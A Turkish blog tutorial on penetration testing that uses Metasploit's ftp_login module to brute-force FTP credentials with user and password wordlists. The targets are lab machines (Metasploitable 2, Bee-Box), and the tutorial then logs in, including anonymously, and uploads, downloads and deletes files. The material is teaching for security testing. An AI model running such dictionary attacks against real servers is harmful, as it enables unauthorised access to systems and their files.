MSF ftp_login Auxiliary Modülü ile FTP Servisine Erişim Sağlanabilecek Hesaplara Ait Kimlik Bilgilerinin Tespit Edilmesi ve FTP Erişiminin Sağlanması

Sızma testleri sırasında, IP ve port bilgisi tespit edilen FTP servisine erişim sağlayabilecek kullanıcı hesaplarının kimlik bilgilerinin tespit edilmesi gerekmektedir. Bu yazıda, MSF ftp_login auxiliary modülü kullanılarak, sözlük saldırısı ile FTP servisine erişim sağlayabilecek hesaba ait kimlik bilgileri elde edilecek ve FTP bağlantısı sağlanacaktır.

100.100.200.7 IP adresli Metaploitable 2 sunucusunda FTP servisi çalışmaktadır.

nmap -p21 100.100.200.7 -sV –open -Pn

obtaining-authentication-informations-that-can-be-logged-on-ftp-server-by-using-msf-ftp-login-auxiliary-module-01

 

FTP sunucusuna erişim sağlayabilecek kullanıcı hesaplarının tespiti için MSF ftp_login auxiliary modülü kullanılabilir.

search ftp_login
use auxiliary/scanner/ftp/ftp_login
show options

obtaining-authentication-informations-that-can-be-logged-on-ftp-server-by-using-msf-ftp-login-auxiliary-module-02

 

Hedef sunucu IP adresi ve sözlük saldırı için kullanılacak dosyalar verilerek modül başlatılabilir. Başarısız erişimlerin gösterilmemesi için “Verbose” seçeneği “false” olarak ayarlanabilir.

set RHOSTS 100.100.200.7
set USER_FILE /root/Desktop/Paylasim/Kullanicilar
set PASS_FILE /root/Desktop/Paylasim/Parolalar
run
set VERBOSE false
run

obtaining-authentication-informations-that-can-be-logged-on-ftp-server-by-using-msf-ftp-login-auxiliary-module-03

 

Böylece tespit edilen kullanıcı ile ftp servisine erişim sağlanabilir.

ftp -v 100.100.200.7
help
ls

obtaining-authentication-informations-that-can-be-logged-on-ftp-server-by-using-msf-ftp-login-auxiliary-module-04

 

 

Temel FTP İşlemleri

FTP servisi ile hedef sisteme girdikten sonra dosya alma veya dosya yükleme işlemleri gerçekleştirilebilir.

Not: Bu aşamada kullanılan Bee-Box sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

 

FTP ile kimlik doğrulama yapılmıyorsa anonim olarak “anonymous” kullanıcı adı ile giriş yapılabilir.

ftp 192.168.133.159
anonymous
HerhangiBirŞeyYazılabilir
help

 

Erişim sağlandıktan sonra mevcut dizinin kontrolü için “pwd”, klasör oluşturmak için “mkdir”, mevcut dizindeki nesneleri listelemek için “ls”, bir dizinin içerisine girmek için “cd”, sunucuya dosya atmak için “put”, mevcut dosyayı silmek için “delete” kullanılabilir.

pwd
mkdir YeniKlasor
ls
cd YeniKlasor
pwd
put Kullanicilar KullaniciListesi
ls
delete KullaniciListesi
ls

 

Mevcutta bulunan klasörü silmek için “rmdir”, mevcutta bulunan bir dosyayı FTP sunucusundan yerel sisteme (bu örnek için Kali makinesine) almak için “get”, FTP sunucusu ile bağlantıyı kesmek için de “bye” komutları kullanılabilir.

pwd
cd ..
pwd
rmdir YeniKlasor
ls
get Terminator_Salvation.pdf Terminator.pdf
bye
ls

 

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.